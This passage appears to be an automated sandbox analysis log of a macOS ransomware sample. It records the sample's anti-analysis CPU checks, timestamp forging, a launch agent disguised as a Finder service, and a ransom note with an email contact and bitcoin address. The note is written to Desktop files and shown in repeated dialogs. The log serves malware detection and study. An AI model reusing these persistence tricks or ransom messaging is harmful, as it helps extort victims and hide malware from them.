Source: /var/root/Library/.FS_Store (PID: 718)Shell command executed: sh -c echo $((`sysctl -n hw.logicalcpu`/`sysctl -n hw.physicalcpu`))|grep 2 > /dev/null
Source: /var/root/Library/.FS_Store (PID: 734)Shell command executed: sh -c echo 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' > ~/Desktop/__README__0
Source: /var/root/Library/.FS_Store (PID: 734)Shell command executed: sh -c osascript -e 'display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac''
Source: /var/root/Library/.FS_Store (PID: 738)Shell command executed: sh -c echo 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' > ~/Desktop/__README__1
Source: /var/root/Library/.FS_Store (PID: 738)Shell command executed: sh -c osascript -e 'display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac''
Source: /var/root/Library/.FS_Store (PID: 741)Shell command executed: sh -c echo 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' > ~/Desktop/__README__2
Source: /var/root/Library/.FS_Store (PID: 741)Shell command executed: sh -c osascript -e 'display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac''
Source: /var/root/Library/.FS_Store (PID: 745)Shell command executed: sh -c echo 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' > ~/Desktop/__README__3
Source: /var/root/Library/.FS_Store (PID: 745)Shell command executed: sh -c osascript -e 'display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac''
Source: /var/root/Library/.FS_Store (PID: 748)Shell command executed: sh -c echo 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' > ~/Desktop/__README__4
Source: /var/root/Library/.FS_Store (PID: 748)Shell command executed: sh -c osascript -e 'display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac''
Source: /var/root/Library/.FS_Store (PID: 751)Shell command executed: sh -c echo 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' > ~/Desktop/__README__5
Source: /var/root/Library/.FS_Store (PID: 751)Shell command executed: sh -c osascript -e 'display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac''
Source: /var/root/Library/.FS_Store (PID: 754)Shell command executed: sh -c echo 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' > ~/Desktop/__README__6
Source: /var/root/Library/.FS_Store (PID: 754)Shell command executed: sh -c osascript -e 'display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac''
Source: /var/root/Library/.FS_Store (PID: 757)Shell command executed: sh -c echo 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' > ~/Desktop/__README__7
Source: /var/root/Library/.FS_Store (PID: 848)Shell command executed: sh -c osascript -e 'display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac''
Source: /var/root/Library/.FS_Store (PID: 851)Shell command executed: sh -c echo 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' > ~/Desktop/__README__38
Source: /var/root/Library/.FS_Store (PID: 851)Shell command executed: sh -c osascript -e 'display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac''
Source: /var/root/Library/.FS_Store (PID: 854)Shell command executed: sh -c echo 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' > ~/Desktop/__README__39
Source: /var/root/Library/.FS_Store (PID: 854)Shell command executed: sh -c osascript -e 'display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac''
Source: /var/root/Library/.FS_Store (PID: 857)Shell command executed: sh -c echo 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' > ~/Desktop/__README__40
Source: /var/root/Library/.FS_Store (PID: 857)Shell command executed: sh -c osascript -e 'display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac''
Source: /var/root/Library/.FS_Store (PID: 860)Shell command executed: sh -c echo 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' > ~/Desktop/__README__41
Source: /var/root/Library/.FS_Store (PID: 860)Shell command executed: sh -c osascript -e 'display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac''
Source: /var/root/Library/.FS_Store (PID: 863)Shell command executed: sh -c echo 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' > ~/Desktop/__README__42
Source: /var/root/Library/.FS_Store (PID: 863)Shell command executed: sh -c osascript -e 'display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac''
Source: /var/root/Library/.FS_Store (PID: 866)Shell command executed: sh -c echo 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' > ~/Desktop/__README__43
Source: /var/root/Library/.FS_Store (PID: 866)Shell command executed: sh -c osascript -e 'display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac''
Executes the "grep" command used to find patterns in files or piped streams
Source: /bin/sh (PID: 689)Grep executable: /usr/bin/grep -> grep Mac
Source: /bin/sh (PID: 693)Grep executable: /usr/bin/grep -> grep 2
Source: /bin/sh (PID: 707)Grep executable: /usr/bin/grep -> grep Mac
Source: /bin/sh (PID: 711)Grep executable: /usr/bin/grep -> grep 2
Source: /bin/sh (PID: 721)Grep executable: /usr/bin/grep -> grep Mac
Source: /bin/sh (PID: 725)Grep executable: /usr/bin/grep -> grep 2
Executes the "sysctl" command used to retrieve or modify kernel settings
Source: /bin/sh (PID: 688)Sysctl executable: /usr/sbin/sysctl -> sysctl hw.model
Source: /bin/sh (PID: 694)Sysctl executable: /usr/sbin/sysctl -> sysctl -n hw.logicalcpu
Source: /bin/sh (PID: 696)Sysctl executable: /usr/sbin/sysctl -> sysctl -n hw.physicalcpu
Source: /bin/sh (PID: 706)Sysctl executable: /usr/sbin/sysctl -> sysctl hw.model
Source: /bin/sh (PID: 712)Sysctl executable: /usr/sbin/sysctl -> sysctl -n hw.logicalcpu
Source: /bin/sh (PID: 714)Sysctl executable: /usr/sbin/sysctl -> sysctl -n hw.physicalcpu
Source: /bin/sh (PID: 720)Sysctl executable: /usr/sbin/sysctl -> sysctl hw.model
Source: /bin/sh (PID: 726)Sysctl executable: /usr/sbin/sysctl -> sysctl -n hw.logicalcpu
Source: /bin/sh (PID: 728)Sysctl executable: /usr/sbin/sysctl -> sysctl -n hw.physicalcpu
Executes the "touch" command used to create files or modify time stamps
Source: /bin/sh (PID: 698)Touch executable: /usr/bin/touch -> touch -ct 201606071012 /var/root/Library/.FS_Store
Source: /bin/sh (PID: 699)Touch executable: /usr/bin/touch -> touch -ct 201606071012 /var/root/Library/LaunchAgents/com.apple.finder.plist
Source: /bin/sh (PID: 730)Touch executable: /usr/bin/touch -> touch -ct 201606071012 /var/root/Library/LaunchAgents/com.apple.finder.plist
Source: /bin/sh (PID: 731)Touch executable: /usr/bin/touch -> touch -ct 201606071012 /var/root/Library/.FS_Store
Explicitly loads/starts launch services
Source: /bin/sh (PID: 701)Launch agent/daemon loaded: launchctl load /var/root/Library/LaunchAgents/com.apple.finder.plist
Explicitly unloads, stops, and/or removes launch services
Source: /bin/sh (PID: 700)Launch agent/daemon removed: launchctl remove com.apple.finder
Reads launchservices plist files
Source: /var/root/Library/.FS_Store (PID: 718)Launchservices plist file read: /private/var/root/Library/Preferences/com.apple.LaunchServices.plist
Uses AppleScript framework/components containing Apple Script related functionalities
Uses AppleScript scripting additions containing additional functionalities for Apple Scripts
Source: /usr/bin/osascript (PID: 802)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/Info.plist
Source: /usr/bin/osascript (PID: 805)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/Digital Hub Scripting.osax/Contents/Info.plist
Source: /usr/bin/osascript (PID: 805)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/Info.plist
Source: /usr/bin/osascript (PID: 808)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/Digital Hub Scripting.osax/Contents/Info.plist
Source: /usr/bin/osascript (PID: 808)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/Info.plist
Source: /usr/bin/osascript (PID: 811)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/Digital Hub Scripting.osax/Contents/Info.plist
Source: /usr/bin/osascript (PID: 811)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/Info.plist
Source: /usr/bin/osascript (PID: 814)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/Digital Hub Scripting.osax/Contents/Info.plist
Source: /usr/bin/osascript (PID: 814)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/Info.plist
Source: /usr/bin/osascript (PID: 817)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/Digital Hub Scripting.osax/Contents/Info.plist
Source: /usr/bin/osascript (PID: 817)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/Info.plist
Source: /usr/bin/osascript (PID: 820)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/Digital Hub Scripting.osax/Contents/Info.plist
Source: /usr/bin/osascript (PID: 820)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/Info.plist
Source: /usr/bin/osascript (PID: 823)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/Digital Hub Scripting.osax/Contents/Info.plist
Source: /usr/bin/osascript (PID: 823)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/Info.plist
Source: /usr/bin/osascript (PID: 826)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/Digital Hub Scripting.osax/Contents/Info.plist
Source: /usr/bin/osascript (PID: 826)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/Info.plist
Source: /usr/bin/osascript (PID: 829)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/Digital Hub Scripting.osax/Contents/Info.plist
Source: /usr/bin/osascript (PID: 829)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/Info.plist
Source: /usr/bin/osascript (PID: 832)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/Digital Hub Scripting.osax/Contents/Info.plist
Source: /usr/bin/osascript (PID: 832)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/Info.plist
Source: /usr/bin/osascript (PID: 835)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/Digital Hub Scripting.osax/Contents/Info.plist
Source: /usr/bin/osascript (PID: 835)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/Info.plist
Source: /usr/bin/osascript (PID: 838)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/Digital Hub Scripting.osax/Contents/Info.plist
Source: /usr/bin/osascript (PID: 838)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/Info.plist
Source: /usr/bin/osascript (PID: 841)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/Digital Hub Scripting.osax/Contents/Info.plist
Source: /usr/bin/osascript (PID: 841)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/Info.plist
Source: /usr/bin/osascript (PID: 844)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/Digital Hub Scripting.osax/Contents/Info.plist
Source: /usr/bin/osascript (PID: 844)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/Info.plist
Source: /usr/bin/osascript (PID: 847)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/Digital Hub Scripting.osax/Contents/Info.plist
Source: /usr/bin/osascript (PID: 847)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/Info.plist
Source: /usr/bin/osascript (PID: 850)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/Digital Hub Scripting.osax/Contents/Info.plist
Source: /usr/bin/osascript (PID: 850)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/Info.plist
